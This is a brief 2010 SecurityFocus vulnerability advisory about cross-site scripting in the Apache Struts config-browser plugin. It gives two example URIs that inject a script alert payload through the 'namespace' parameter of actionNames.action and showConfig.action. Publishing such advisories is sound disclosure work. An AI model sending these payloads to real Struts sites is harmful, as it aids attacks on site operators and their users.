Apache Struts Multiple Cross Site Scripting Vulnerabilities

Attackers can exploit these issues by enticing an unsuspecting victim into following a malicious URI.

The following example URIs are available:

http://www.example.com/struts2-07/config-browser/actionNames.action?namespace=
<script>alert(/xss/);</script>

http://www.example.com/struts2-07/config-browser/showConfig.action?namespace=
<script>alert(/xss/);</script>&actionName=showcase


 

Privacy Statement
Copyright 2010, SecurityFocus